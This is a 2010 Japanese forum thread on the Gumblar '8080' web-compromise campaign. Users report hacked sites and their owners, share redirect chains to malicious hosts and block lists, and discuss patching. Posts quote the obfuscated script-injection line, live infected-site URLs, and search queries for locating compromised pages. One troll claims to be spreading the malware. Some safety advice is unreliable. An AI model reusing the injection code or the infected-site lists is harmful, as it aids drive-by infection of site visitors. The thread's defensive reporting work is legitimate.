「Adobe AIR 2」正式版公開、高速化やOSとの連携強化、セキュリティ修正も
http://internet.watch.impress.co.jp/docs/news/20100611_373777.html

これはAdobe AIRにもFlashゼロデイ攻撃の脆弱性が含まれてたということだよな

アドビは本当にやる気無いな
ゼロデイ状態でも一月くらい平気で待たすし

document.write('<s'+'cript type="text/javascript" src="[URL]"></scr'+'ipt>');
さっそく弄ってきたｗ

>>718
新型avast!反応しないね(´･ω･`)

というか.jsの中身がcom:8080だと今更気付いた

>>725
新型はリダイレクト先が
blog●bigsophieblog●com/
sogpaoiy●the-mlmpowercall●com/
この２つに集約されてるから、hostsファイルで簡単に蹴れる
ドメインが増えたら抜けちゃうけどなｗ

>>723
市場独占してるからってふんぞり返って
世界に流通してるソフトのセキュリティを疎かにするってのは
世界中にウイルスを広がらせて打撃を与えてるってのと同義なのにね
ウイルスばらまく連中と大差ない、むしろ一般人にはクリーンを装ってる分それ以上か

アメリカ人が損賠請求しないかな

ttp://mamono.2ch.net/test/read.cgi/hiphop/1248625357/536
ttp://yutori7.2ch.net/test/read.cgi/campus/1275391180/105
ttp://changi.2ch.net/test/read.cgi/cchara/1274810547/877
ttp://changi.2ch.net/test/read.cgi/wcomic/1274275657/521
ttp://yutori7.2ch.net/test/read.cgi/soccer/1274426256/701
ttp://pc11.2ch.net/test/read.cgi/sec/1268032521/571
ttp://yutori.2ch.net/test/read.cgi/nhk/1269009072/51

↑悪用が収まらないので感染中のURL晒すのは止めたらいかがですか？
ウイルスばらまく連中に利用されてるように思います

2chで外部URLがあったらブラクラ・ウイルスだと思ってください
そして、このスレはちゃんと鯖管に通報したりしてますよね

>>730のリンクのスレにこのスレのリンクを貼って
対策を促せばいいんじゃないでしょうか

>>730
「自己責任」という言葉はご存知無いのでしょうかネ？

>>656が書いてるように、２ちゃんねるの使い方＆注意 http://info.2ch.net/guide/faq.html#B4 には
>被害を未然に防止するためには、むやみにURLをクリックせず (中略) 転んでも泣かない。。。

貼ってあるURLを疑いもせず、いきなり踏むほうにも問題があります。
>>640も書いてますね。

取説をしっかり読んでから文句を言って下さい。


踏まされて悔しかったら、涙を拭いて…クリーンインストール後に>>4を実施しましょう。
因みに、http://gw.aguse.jp/ を通せば、何が仕掛けられていてもPCには影響が無いので覚えておいて下さい。
aguseはブックマーク推奨ですよ。

>>730
つ｢鏡｣

昔から提示されたURLホイホイ踏むのはアホのやる事って言われてたしな
踏むものがブラクラからウイルスに変わっただけ

www●maizurusou●co●jp/equip/index●html
だが、SonicWallのゲートウェイAVがGumlar_7として反応する。
しかし、ソースをみてもそれらしきものがみあたらん。
ちなみにウイルスバスターも反応しない。
SonicWall抜きでアクセスしても飛ばされた様子もない。
やられてますかね?

どこに目を付けてんだ
フレームしか無いシンプルなトップにおもいっきりあるじゃんか

>>736
ありがとう。逝ってきます・・

一応電凸しておいた。
「またでいすか?」という反応だった。

●com：8080ｷﾀｰ
www●yosegi●jp

>>730
お前いいかげん、うぜえよ

複数サイト管理してるんだが、そのうち1つが改竄されてた。
で、その鯖缶のサイトトップが改竄されてたようなんだが、これは自分は感染してないと見てOK?

>>740
とりあえずスキャンしろ

コテは好きじゃないけど仕方ないか…

>>740
不安に思ったら迷わずスキャンしたほうがいいですよ
それほど手間の掛かる作業でもありませんしね

>>735
メル凸しておきましたと事後報告
Gredで覗いた限りでは綺麗になってますね

>>738
メル凸しました
ついでにJPCERTに報告、Aviraに検体提出済み

www●kobesaito●com

これも8080系

そういや最近のGumblerだと対策せず感染したページ見たらウイルスをなすりつけてくるページに飛ばされるのかな？
それともウイルス自体埋め込みだから「感染した！」って解らない？
後者なら恐ろし過ぎるな、普段見てるページすら安心して出歩けないじゃん
過去ログ見る限りレジストリまで弄らないと対策不十分とまで言われるみたいだし
そこまで徹底しないとダメなんじゃあ今も感染が広がるのも納得

>>727
検索して飛んだサイトから
そのドメインにリダイレクトされてびびったわ

FWでブロックしてたから接続されなかったけど

>>743
さくらインターネット、JPCERTに報告しました

>>744
> そういや最近のGumblerだと対策せず感染したページ見たらウイルスをなすりつけてくるページに飛ばされるのかな？
前のを知ってるならレス見てればわかると思うけど変わってないよ

レジストリまで確認しなきゃいけないのは稀な例で一般的にはそこまで必要ない
だいたいハンパなJREが入っていることの方が多い
サイト管理者が感染しても仕方ないという理由にはならないね

artsplanet●biz
com：8080な件

>>747
そのJREがコンパネで消しただけじゃダメだからアレなんじゃないの？
感染するのはホームページ持ってるユーザーだけじゃないし、
一般人にはコンパネで消した後も残骸が残ってる、しかも残ってる場所が1つの誤削除でPC動かなくなるかもしれないレジストリなんて予想だにせんよ

>>749
一部のメーカー製PCだけプリインストールされてる古いバージョンが消せないってだけで
通常はそんなのないです

GENOにかかってるか不安な奴はここを見てみ
このサイトのカーソルを当ててなくても波紋が出るならアウト
危険なサイトじゃない安心しろ一応

http://www.geocities.jp/saaikoka/omosiro/omosiro28.htm

>>750
通常は、って言ったところで対象にはあるじゃん
プリインストール版はコンパネで消して、見た目は消えてても消した事にならないとか書いてないから被害広がってるところあるんじゃね？
ホントに根絶やしにしたいならそういうところもテンプレ徹底しなくちゃ

んなレアケースのことなんざどうでもいいよ
どうしてもってならお前がテンプレ作れ

>>748
さくらインターネット、JPCERTに報告済み
Aviraに検体を提出しました


ttp://yamagata.int21h.jp/tool/GumblarChk/
こんなツールあったんですね

>>752
自己防衛が目的であって根絶やしなんていう非現実的なものは目標ではないんだけど
テンプレおねがいしますね

>>754
すごいけど、3月から更新無いね
現在のものには無力じゃないかな？

>>754 乙乙
--
http://www.google.co.jp/search?hl=ja&source=hp&q=%22src%3D%22%2B%22http%3A%2F%2F%22%2B%22.ru%22OR%22.info%22OR%22.at%22OR%22.com%22%2B%22%3A8080%2F%22%2B%22.js%22%2B%22%3C%5C%2Fscript%3E%3C%22+-JScript+-localhost+-Analyzer+filetype%3Ahtml
色々試したけど、まったく釣れない･･orz

>>756
サイト構成やリンク先、スクリプトの一覧を一気に把握できるので、
意外と使い方次第かもしれない…とか思ってみたり

>>757
お疲れ様です、検索ワードが苦戦のほどを物語ってますね…
こちらもほぼお手上げ状態、何か良い方法はないものか

bingで検索したほうがいいよ

www■4gamer■net/

4亀やられてる？

ウイルス対策ソフトが反応しました？

　　 ＿＿_
　　|＿＿_ミ⌒ヽペタン
　　　 ｜　 ⌒)ノ ペタン
　.＿ノ ） 　 （(
　| .・∀|　　（ 嘘ヽ
　|＿＿|　 |￣￣￣|
　 /　　> . | 　　　　|
""""""""""""""""""""

>>760
gredとAguseは無反応
Dan's View Sourceで見る限りあやしいコードは無さそうだけど？

あと、ここは鑑定スレじゃない

じゃあそういう類の鑑定スレがあるのか……と言われるとな
結局Gumblerスレあるのここだけだし
初心者もここにすがるしかないんよね

勇気がなくて踏めないURL鑑定スレin初質 Part41
http://gimpo.2ch.net/test/read.cgi/qa/1274878983/

ここでいいじゃん

>>761-765
8080フィルタが誤爆してただけだった
ホントすみません、4亀さんもすみませんでした

感染の確認方法がないのが痛い。
不安ならアンインストールｗ

>>767
怪しい確認方法よりスキャンのがはるかに良い

ノートンゴーストで4日前に戻した
これでウィルスなくなってる？

クリーンインスコとか普通なら最終手段なのにな
出現からもうすぐで一年になるのに感染したらこれしかないとか・・・

感染しているかどうかはどこで判断すればいいの？

>>730
( ´,дゝ`)俺様こそがまさにウィルス貼りまくってる張本人だがなにか文句でも？
まるでこのスレの住人が同罪みたいな言いようだが、正確には共犯者なのだお( ´,дゝ`)ｳﾌ

それにお前のような奴がいるからやめられねぇ「踏ませ」はな(�Vд�V)v

>>771
テンプレをよーーく見たまえ
チェックするところ沢山あるから
ニパ（�Vд＾）−☆

特に>>2で探すのが一番確実な方法ですね。
はい。調子に乗り乗りな気分です。
次スレでも同じことをするつもりです。
このスレの削除依頼出した奴、無駄な努力お疲れ。

(�Vд�V)調子に乗り乗りの気分です(�Vд�V)

そういやaguseだと何処見れば対象のページがGumbler感染してるって教えてくれるんだろう
Gredは単純に「危険です」で教えてくれるんだろうけど、aguseは見るところ多すぎてゴチャゴチャでワケワカメ

やべぇえええええ

(*�Vд�V*)最近心がとても穏やかだぜ俺！！
悪意を持って悪をなしてたのに最近は天使のような心で悪をなしているお！！！


(�V｀д´�V)こ！このままでは！天使になってしまうではないかー！

さて
新宿VIPクリスタル行ってこよっと( �Vд�V)

>>775
確かにわかりにくいよね

>>771
アンチウィルスソフトにドライブバイダウンロード用のダウンローダが検出されたら

ドライブバイダウンロード用のダウンローダがどこのフォルダに作成されたかが分かればいいのだがなあ

>>775
取得画像の下にGumbler感染してる可能背がありますってでるぞ

>>780
そういうのは一時的にわかったとしても
1時間後には変更されてるかもしれないから意味がない

www.value-2han●com

取扱注意
www●sakaue-farm●co●jp
農業IT化したらウィルス(害虫)にやられてたでござる

>>783
www●aguse●jp/?m=w&url=www●value-2han●com
> Trojan.JS.Iframe.mi
> temp●hbsouthmomsclub●com:8080/Website●js
警察庁に通報しました

>>784
www●aguse●jp/?m=w&url=www●sakaue-farm●co●jp
メル凸に反応した様でござる、「403 Forbidden」


[補足]

www●value-2han●com
http://www.virustotal.com/analisis/eba1f66d999a07fb74a3d32ec27cf59777ea07ddfcd2dffe3c122f2ea51626e0-1276835405
（com:8080/.jsを落とせず…aguse判定ではサイト消失っぽい）
↓
zbestfilm●net/media/kal/index●php
http://www.virustotal.com/analisis/6ce551224d79142bf877b8003fa0cee6a3bec0d478327537893fb48c7d6f1558-1276835152
↓
id40478●srvdata●ru/mif●js
http://www.virustotal.com/analisis/c42d6f6dfa044de4ff12bc8dd4e37418d5f6dec95e43a387798c999cf6edab0b-1276834287

取扱注意
www●dord●co●jp
深海調査のエキスパートねぇ…

>>786
よく見つけてきますねえ…
メル凸済み、JPCERTに報告、反応待ち

>>夷塚さん
お疲れ様
リアルタイムで危険性を痛感している方が指摘する、「オープンなやりとりは危険を伴う」という意見にも頷けるので
僕はここを「無いよりはマシな程度」の存在にすぎないと思ってます（早い話が必要無い派です）

>>787は、探すのが面倒なcom:8080を幾つも発掘している事に驚いている、
という意味で書いたのですが、読み返すと日本語おかしいですね
気が緩んでいたかな…申し訳ありません

>>788
まさか八頭氏からご指名とは驚きました
俺は「必要なくなる日が来るといいなあ」以上の事は考えてませんよ

レス削除なかなかされないねぇ

このスレのテンプレ見て踏んで被害者が増えない事を祈るのみ

あと運営仕事しろ

【陥落サイトのURL悪用厳禁】
www●leclat●net/blog/

>>789
確かに面倒なのでｓ･･orz

ttp://www.google.co.jp/search?q=%22.com%3A8080%2F%22%2B%22Access_Point.js%22+OR+%22Backup.js%22+OR+%22Cable_Modem.js%22+OR+%22Data_Type.js%22
+OR+%22Default.js%22+OR+%22Del.icio.us.js%22+OR+%22Finder.js%22+OR+%22Gigahertz.js%22+OR+%22Gnutella.js%22

ttp://www.google.co.jp/search?hl=ja&q=%22.com%3A8080%2F%22%2B%22Hard_Copy.js%22+OR+%22Hardware.js%22+OR+%22HDMI.js%22+OR+%22JPEG.js%22+OR+%22
Kbps.js%22+OR+%22Kibibyte.js%22+OR+%22Link.js%22+OR+%22Name_Server.js%22+OR+%22Null.js%22+OR+%22OASIS.js%22+OR+%22Open_Source.js%22

ttp://www.google.co.jp/search?hl=ja&q=%22.com%3A8080%2F%22%2B%22Page_View.js%22+OR+%22Parallel_Port.js%22+OR+%22Paste.js%22+OR+%22Raw_File.js%22
+OR+%22Scrolling.js%22+OR+%22Tag.js%22+OR+%22Telnet.js%22

ttp://www.google.co.jp/search?hl=ja&q=%22.com%3A8080%2F%22%2B%22Unix.js%22+OR+%22Undo.js%22+OR+%22Unfriend.js%22+OR+%22Unmount.js%22+OR+%22
Video_Card.js%22+OR+%22Webmaster.js%22+OR+%22Website.js%22+OR+%22Web_Page.js%22+OR+%22XML.js%22+OR+%22Yahoo.js%22

※「長い行ががが」と叱られたから、てきとーなとこで改行してありま。


あきた(から)ねる..

>>791
メル凸済み、反応待ち

www●itecjapan●co●jp/js/jQuery●js
末尾のdocument.writeがそうだと思う

www17●ocn●ne●jp/~pss/

www6●ocn●ne●jp/~mikajima/

>>794
>>795
JPCERT、IPAに報告しました

>>796
スクリプトが見当たりません…探し方が悪いのかな

>>797
センセイに聞くと
「このサイトはコンピュータに損害を与える可能性があります。」

ソースにそれっぽいのが無いから修正済かも･･

Last-Modified: Sat, 19 Jun 2010 09:10:53 GMT
修正したんだろね。

Flash Playerの脆弱性を悪用、改ざんサイト訪問でウイルス感染の危険
http://internet.watch.impress.co.jp/docs/news/20100621_375855.html

二匹目のドジョウ狙いらしい

スポーツ報知や日刊スポーツの
ttp○//as○sr○impact-ad○jp/hserver/
ってJavaScriptがあやしい・・・

>>801
www.google.co.jp/search?q=%22impact-ad.jp%22
広告のようだけど、あやしいってのは具体的に？
アクセスしてみる限りは、ウェブ改竄の不正コードはない

>>800
国内サイトは十数件ぐらいやられたかんじ
www.google.co.jp/search?lr=lang_ja&q=%22in/yahoo.js%22&num=50

>>802
801だが　1つの記事見てる間にクリック音が何回か鳴って
IE8左上の戻るサイト一覧のところにttp○//as○sr○impact-ad○jp/hserver・・・
があったからどうしたのかと思って

MSEでフルスキャンしたら何もウイルスは見つからなかった

>>803
トラッキングクッキーに反応しただけだと思わｒ

普段見てるページも感染してるんじゃないかって思って日々aguseで石橋を叩く日々だ

DELLで買った奴だからプリインストール版入ってて、コンパネで消したけど不安だよ
ここには対処法は「削除用外部ソフトウェアインスコでおｋ」で片づけられてるし……
初見には外部ソフトウェアは怖い

取扱注意
www●akuriru●jp
見た感じは8080っぽくないけど、jsファイルが危険すぎﾜﾛﾀ
Web_Page.js ＼(^o^)／

Javaを完全にアンインストしたいならJavaRa使えば？

とりあえず砂箱通してウェブ見てるけど
これも絶対じゃないからなぁ

>>805
aguseはスルーもあるよ

Chromeブラウザ、Flashに続いてPDFもプラグイン統合
http://journal.mycom.co.jp/news/2010/06/18/019/

関係ないか…

http://docs.google.com/viewer
これみたいなもんだろ？

>>809
確かgredもスルーするよな、ウイルスの特性上普段見てるサイトが次の日感染してて……なんてこともあり得るわけだから
恐ろしいったらありゃしない

>>807
外部ソフトウェアわざわざ使わなきゃいけないってのが不安なんだよ……
「プリインストールはコンパネで削除だけじゃむだ」と言って理由を聞かれると「レジストリに残骸が〜」といつもあいまいに返して、その残骸の詳細はまったく出てこない

>>811
簡易型のリーダーがプラグインとしてインスコされてた。

IEで開くよりは軽い気がする。

>>813
ほうほう、Chrome OSに向けて着々と機能増やしてるね

>>812
そもそもDELLにも残骸残ることが確定なの？
あれはNECの一部だけじゃないの？
相当古い機種じゃなきゃあんな変なプリインストールなくね？

>>815
「残骸が残る」としか過去に言われてないからそこまで解らないんだ
そもそも残骸がどんなのか、どこにあるのか、regedit.exeで見たらどう映るのか
ただ「残骸あるある」だけでそこから先が全く話に出てないから……

>>816
それっぽい単語でレジストリ検索してもでないならどうしようもなくね
そんな見えないもんに震えてないでDELLのサポートにでも聞けばいいんじゃないの

>>817
期限切れた、アンインスコ済み、そもそも「それっぽい単語」ってのも初見にはサッパリ……
過去ログ読んで知ってそうな「残骸あるある」さんのログ見てもホントに「残骸あるよ」「メーカ品は残骸ある」のゴリ押しだけだし……

>>818
javaくらい思いつかないか？
レジストリじゃなくてもとりあえずjava.exeをファイル検索してみる程度はやったの？
調べる気もなく過剰に心配してるだけならPC捨てるのが一番安全だよ
しかもDELLってだけで他の情報は隠蔽されてるから調べようがない
そもそも本当にそれはプリインストールされていたの？

この方法でOS入れなおせば余計なソフトははいらないっぽいけどどうなんだろ
http://supportapj.dell.com/support/topics/global.aspx/support/dsn/en/document?docid=179256#Issue8

スレの過去ログ読んでもググっても解らないからこそ書いてるのに「調べる気もない」「PC捨てれば？」だなんて……
とりあえずjava.exe検索したらwindows\system32とprogramfile\jre6\binに一つずつあった
どっちも作成日時は2010/04/16だった

すいません、検索しなおすとc\i386にも入っていました……
こちらは2005/11/10です

なかようせえへんねんやったらもうピコピコこうたらへんで

>>806
>>792
因みに、akuriru●jpは再発だｗ

渡辺司法書士はこっそり修正後、告知しないで隠蔽かにゃ？
search●yahoo●co●jp/search?p=%22●com%3A8080%2FWebmaster●js%22&ei=UTF-8&fr=top_ga1_sa&x=wrt&meta=fl%3D3

akuriru●jp
こっそりなおしてる

>>820
以下は通常JREインストールで入るjava.exe
> windows\system32とprogramfile\jre6\bin
java.exeを右クリック→プロパティからバージョンは確認できる
日付も新しいようだしまだこれはインストールされてるんじゃね

c\i386はリカバリ領域かなんかじゃないかと

>>825
アドバイスありがとうございます
そちらの二つは両方とも「6.0.200.2」と最新でした
c\386は「5.0.60.5」でしたが、ググってみるとクリーンインストール用CDの予備みたいなものだと判明
実影響は無いようなので、実質プリインストールの残骸は無い、と見ても大丈夫ですか？

>>826
ここで大丈夫と言っても何の保証もないんであとは自分で判断してください

ipatukouta●altervista●org/php5/

>828
多重トラップ注意

>>3
>まず、感染したかどうかは>>2のチェッカーで確認しましょう
これはどういう意味なのでしょうか？
>>2のリンク先をクリックすれば良いのですか？

テンプレ罠だらけだから

>>830
>>4よめ
感染したかについてはスキャンしてなにか出てきたら当たりかもしれない

もうセキュリティー板は、質問すること自体が誤った行為だとつくづく思いました。

自分で調べるのが一番。

やっと理解したか
おめでとう

　　　　　　　　　　　　　　　　　　　　　　　ｺﾝｸﾞﾗｯﾁｭﾚｰｼｮﾝ
　　　　　　　　　　　　　,―＝=７　　　　　Ｃｏｎｇｒａｔｕｌａｔｉｏｎ！　　　ｺﾝｸﾞﾗｯﾁｭﾚｰｼｮﾝ
　　　　　　　　　　　　　|く ___ _>　　　　　　　　　　　　　　　　　　　　Ｃｏｎｇｒａｔｕｌａｔｉｏｎ！
　　　　　　　　　　　　　ｆll｀ｰU+'
　　　　　　　　　　　　　｀''､ ｰ=|　　　　　　おめでとう・・・・・・・・！
　　　　　　　　　　_,,..-´:|ヽー-;ｰ..,,_
.　　,−＝-,　,,..-‘≡≡:|　><´|≡::|ヽ　　　　おめでとう・・・・・・・・！　　おめでとう・・・・・・・・！
.　　| l____ヽ.|≡ｌ≡≡≡| |::| |≡:::/::|
.　　|(ｌｌｰ´_ヽ|≡|≡≡≡|.|:::|ｌ≡::/::::|　　　　　　おめでとう・・・・・・・・・・・・！
..　４ ｌ__｀=|_|≡:|≡≡≡::||:::|'≡/≡|
／|＼,.･|::≡:|ヽ|≡≡≡≡≡:::/|≡::|　　　　　　　　　　　　　　　　　　　　　　　　　＿,,.........､
≡|/}:ヽ|:≡|::::|{≡≡≡≡≡:::{　.|≡::|　　　　　　　　　　　　　　　　　　　　　　　　ヽ_,,　　　ヽ
≡:| |:::|ｌ≡:|≡|:|≡≡≡≡≡:::|.　.|≡::|　　　　　　　　　　　　　　　　　　　　　　　　/_>　　　|
:::≡ｌ|:::|'≡:|≡:|::|≡≡≡≡≡:::|.　.|≡::|　　　　　　　　　　　　　　　　　　　　　　　|７　llう..　|
≡≡≡≡/|≡ヽ≡≡≡≡≡::::|.　..|≡::|.　　　　ｚ-..,〃、　　　　　　　　　　　　　ﾑ__　ll´..　|
::≡≡≡::/　ヽ≡ヽ≡::|―､≡≡::ｌ　..|≡::|　　　/　　　　ﾐ　　　　　　　　　　　　　　1´/ヽ＝=,...
::≡≡≡|　　　＼≡ヽ::|　　ヽ≡≡ｌ　　.ｌｊヽｌ　　|　　　刀､ﾐ　　　　　　　　　　　_,,,..-｀‐三＝ー-
::≡≡≡|　　　　|ヽ／ｰ.、..　ヽ≡≡ｌ.　　.|/　　|　　ノ= ∠i　　　　　　　　　/ヽ､≡≡≡≡≡
:|¬､≡≡ヽ.　　|≡ゞー=ッ　　|≡≡|　　　__／ (ll ｰ゜＼|ヽ.　　　　　　　/≡::ヽ≡≡≡≡≡
:|　　ヽ≡≡ヽ　|≡≡ヽミ.　　　|≡≡|　　ｌ|. ll７|　ヽu＝/ｌ二ll二ｌ'''ヽ　　/≡:::/≡≡≡≡≡

そして自分で調べる過程で踏むんですねわかります

マジで初心者にも分かるgumblerスレないよな
これじゃ身内同士だけで身を固めてるだけで「騒ぎ収まらないねー」と愚痴っても
そりゃ収まらんわって気が
wikiも現行版に完全に通用しない古い情報ばかりだしな……

AdobeReaderじゃなくてFoxit Reader使ってる

>>836
そんな狭い規模で起きてるわけじゃないんで
ここがどんなにがんばろうがそれだけで収まるようなもんじゃないよ
初心者スレなんて立ててもバカが混乱したレスするだけで何もならないだろ
同人板がまさにそんな感じだったはず
wikiは見てないから知らんけど変えたいならお前が変えてやれば良いんじゃね

初心者用ならこういうのが良さそう
http://www.so-net.ne.jp/security/news/newstopics_201005.html
http://www.so-net.ne.jp/security/news/newstopics_201001.html

>>838
いや、「騒ぎ収まらないねー」ってぼやいてる人達が滑稽に見えただけさ
俺個人はもう対策終えてるし自分の警戒で手いっぱいだから
そこからさらに慈善事業やろうとは思わない

まぁここですらまともな人が来るまで「パソコン捨てれば？」等の問題外な返しで埋まってる事もあるしな……
テンプレまで改竄されて犯罪まがいの事まで起きるし
ID出ない板故致し方なしか

パソがおかしくなりました＞＜程度の質問しかできないような人が大量に来たら
そりゃ誰でも疲れてPC捨てろという程度の回答になるのは仕方ないんじゃね
まともな質問ができなきゃまともな回答にはならない

まともな人が来るっていうのは要するに
そのときまでのパソ壊れた助けて攻撃に心が折れてない人が来るってことじゃないかと
テンプレ改ざんは別件だけども

>>840
それでもそんなアホな返しをしちゃったら「まともな質問しない奴」と同レベルになっちゃうワケで
傍から見れば同レベルにしか見えない
そういうのはスルーでいいんだぜ……？

テンプレ改竄はどうにかならんかな……

そもそもセキュリティ板とか言いながらIDすら非表示な時点でなｗ

www4●ocn●ne●jp/~motegi/ ←不動産屋　連絡するが対処せず
www4●ocn●ne●jp/~hanko/　←はんこや　連絡するが対処せず
www1●ocn●ne●jp/~orchid08/sub5●html　←不動産屋　連絡するが対処せず
www16●ocn●ne●jp/~nisikawa/
www17●ocn●ne●jp/~hidib●j/sirase●html
www2●ocn●ne●jp/~hcy/ryoukin●html　　（gumblar x）
www2●ocn●ne●jp/~lakeside/

OCNの対応は非常に遅い

> www2●ocn●ne●jp/~hcy/ryoukin●html　　（gumblar x）
どこにある？

ITWB2 次回「脅威！ガンブラーウイルスの正体」
ttp://img189.imageshack.us/flvplayer.swf?f=Mgumblaritwb2&autostart=true

取扱注意
www●wedia-t●com

>>843
対応するのはOCNじゃなくてそこを使ってる利用者だろ・・・

当館ホームページ改ざんの件
ttp://www.maizurusou.co.jp/topics/index.html

XPにゼロデイきたー
https://www-950.ibm.com/blogs/tokyo-soc/entry/mshelp0day_20100625?lang=ja

bkc-net●com

【陥落サイトのURL悪用厳禁】
www●hugoinc●us/PDF ←意味不
blog●nadamori●com/ ←新型の「.info:8080」
p-asahi●com/shop/rss/

.biz:8080は来るかな？

USドメだが
dogforums●com

ume

shabao●com/public_html/top_footer
www●ff●iij4u●or●jp/~ceh/lvvl/ferachan
www●daini-survey●com/xmlrpc●php
www●soul-wave●jp/RAYCA/

最近ヤバいコードや新しいコードはどんなのがあるんだ

歴代Gumblar感染サイトとかまとめてる人がいればなあ

このスレの過去ログ全部持ってる人ならいるんじゃない

【陥落サイトのURL悪用厳禁】
www●cb-med●jp/jb/?a=ds&Id=71
電話番号の8080に引っ掛かってきたｗ

0-dayやってるグループと大規模にひっかけてるグループじゃ別グループみたいで、
0-dayコードがいきなり大量攻撃に使われることはあまり無いな

まれによくある

>>856−857
とりあえず危険なコードをまとめたtxtファイルなりwikiなりがあると助かるな

そんなの何に使うの？
悪用されることが目に見えてるよ

ついでにコード自体は難読化されてることも多いんでまとめる意味が無い
被害サイト見てもわからないならわからないとおもう

最近、Webサイト改ざんよりも、メールのリンクから感染させようとするのが増えてきてる。

メールのリンクをクリック
↓
リンク先から com;8080、info;8080 へリダイレクト
↓
index.phpを読み込む
↓
pdfとJREファイルをダウンロードしてローカルで実行される

改ざんされたサイトよりも、メールを送りつけられる方が増えてるな…。
SPAMメールなのにリンクをクリックしちゃうユーザが多すぎて困る

自分が警戒するだけなら、こっちの方がずっと楽だなｗ

最新Gumblar、Windows「ヘルプとサポートセンター」の脆弱性を利用
〜JPCERTが注意喚起
http://www.rbbtoday.com/article/2010/06/28/68725.html
対象となる製品とバージョンはWindows XP Service Pack 2および
Windows XP Service Pack 3、Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2、Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systemsの5種。

　28日現在、マイクロソフト社より本件に関するセキュリティ更新プログラムは
公開されていないため、軽減策として、HCPプロトコルの登録の解除が提示されている。
また本軽減策を自動的に適用するための“Microsoft Fix it”も公開中とのこと。

>>863
送信ドメイン認証でスパム判定してるから、そういったメールは読まないな

送信ドメイン認証NG→ホワイトリストにはいってる特定アドレス以外はデフォルトでスパムメールと判断
でいいんじゃね？

仕事地獄終了…

>>850以降で書き込まれていたURLで、現時点でも
ウイルスが仕込まれているサイトにはメル凸しました
英語サイトはスルー

>>849
http://www.virustotal.com/analisis/167501b07f0cafb8dc73ef4bd0d7ea4640725c7f6a28ac69ccb33a11ec0db2b5-1277714205
http://www.virustotal.com/analisis/ea1eb23873efbb6cba1644ceee736a1977a386dd01105ecc7d39882301a651a0-1277714313
AviraはNotes1をマルウェアと認定している模様
Avastからは反応なし、対応済みなのかな？

blog.unmaskparasites.com/2010/06/17/malware-on-hijacked-subdomains-part-2/
> org:8080/File●js
> biz:8080/File●js

Adobe Acrobat のバージョンアップ

9.3.3.177

Adobeは10年前通ったMicrosoftと同じ道を辿ってるな

yamaga-blanks●com/gazoup2/
yamaga-blanks●com/gazoup2/index●php?mode=rss
yokohamac●com/info/
yokohamac●com/info/?feed=rss2&p=17

本日23:30〜　NHK
ITホワイトボックスII「脅威！ガンブラーウイルスの正体」

>>872
メル凸済み、反応待ち

www.itmedia.co.jp/enterprise/articles/1007/01/news022.html
随分めんどくさい事になってるようですね

>>874
乙
yokohamacは403になってるもよー。
yamaga-blanksにメルポした。

>>873
たった25分？

ホワイトボックスの解説混同しまくり？
ウェブページの改ざん方法から感染させられるウィルスの情報まで一緒くたでよく分からんかった。
とりあえず、セキュリティーツールという偽アンチウィルスソフトの画面が見られて、ふぅんとは思えた。

NHKやっちまったなｗ

なにを？

とりあえず、ホワイトボックスの再放送はまだあるから、生で見るなり録画するなりしてみられるよ。
こっちも録画してアップするか、テキストに書き起こしてみる。

不特定多数向けの構成なんだからあんなものだろ。

現在主流の8080系を「Gumblar(亜種)」と呼ぶの･･いい加減やめませんか？

マスゴミがそう書いちゃったから仕方がない。
drive-by-downloadなんて大昔からあるんだけど、
セキュ関係も説明すんのめんどくさくなって
「いわゆるgumlar」で済ませてる所が多い。

>>845>>873
見るのを忘れましたorz
再放送も見逃すかも(´・ω・｀)

ttp://www.nhk.or.jp/itwb/2/programme/
■ 放送予定
7月3日（土）午前5:00〜
「脅威！ガンブラーウイルスの正体」BS2
7月4日（日）午後2:00〜
「脅威！ガンブラーウイルスの正体」教育

>>875
チェック乙です
「yamaga-blanks●com/gazoup2/」も404みたいですね


そしてGumblar特集を放映してた頃に漁ってたもの
topious●fairwaydrycleaners●net:8080/Scanner●js
topious●fairwaydrycleaners●net:8080/Gnutella●js
topious●fairwaydrycleaners●net:8080/Vector_Graphic●js
huio●e-solutionsystems●net:8080/Hard_Disk●js

.jsに繋がらないので正直何とも言えませんが、一応報告だけ

>>882
じゃあモンブラン

ishikane-hospital●or●jp/isikane_i/

>>887
乙
whoisからめるぽすた。

ゲーム系サイトもまずいのかなあ

少なくとも個人運営サイトは危ないと思う、同人サイトはだいぶ対策が取られてるけどそれでもズカズカ踏み込むのはオススメしないね
ゲームでもwiki系HPならまだ大丈夫……か？詳しくないから解らん

やられない・やられても大丈夫の２段構えにしてるからズカズカ踏み込んでるよ

>>890
>ゲームでもwiki系HPならまだ大丈夫……か？詳しくないから解らん

分からないなら、いい加減なこと言うなよｶｽ。

発売直後の人気ゲームの攻略wikiとか
リンク先がどっかのエロサイトに変えられるとかザラだよな

>>892
お前もお前で一言多いがな

>>887
修正確認
Last-Modified: Sat, 03 Jul 2010 03:16:25 GMT

>>889
ゲームアーツとかGAMESIDE関連のサイトがやられた過去があるから
大手公式サイトでも油断は禁物

三井住友VISAがやられてる時点で

そもそもそういうジャンル分けで考えられる問題じゃない
どこも危ない

ちゅらひめにfm:8080…そういえばそんなドメインもありました
しかしいつから埋まってたんだろう

>>889
絶対安全といえるサイトは正直何処にもないですね
FTPの接続先がどんな内容かなんてお構いなしですから

ふと思う、コミックマーケットも近いこの時期にシャッター前サークルや
出展企業の公式サイトが陥落したらと思うとなかなか恐ろしいものが…

>>夷塚さん甘いよ・・・
ttp://i50.tinypic.com/fw81l3.jpg

強いて言えばhtml読み込まない専ブラ使えるとこが比較的安全度高いくらいか

ちょっと調べたが、最近出たHCPプロトコル云々はまたレジストリを弄らないとダメな類か
一般ユーザー涙目ってレヴェルじゃないな……

ところでブラウザのIE８なんだが、インターネットオプションの「ページの自動読み込み」はどうするべきなんだろうか
これつけっぱなしだと感染してるURLのハイパーリンクに触れただけで読み込まれてしまう？

>>902
> HCPプロトコル云々

それFix it出てる
http://support.microsoft.com/kb/2219475

http://blogs.itmedia.co.jp/grayghost/2010/02/gumblargeno-8ca.html
こういう裁判起こすWeb制作会社にびっくりした

www.google.com/safebrowsing/diagnostic?site=[www.楽々茶.com]/&hl=ja
　　→peer●webserviceaan●ru/js●js
　　　　→109●196●134●58/ssl●html
　　　　　　→cache●globalforexnet●com:8080/index●php?pid=6

>>900
仰りたい事が理解できてるか正直不安ですが、ystat.jsの事でしょうか？
間違ってたらごめんなさい

>>902
リンク先読みは無効にしちゃってもいいんじゃないでしょうか

>>夷塚さん
これは2008年のお話
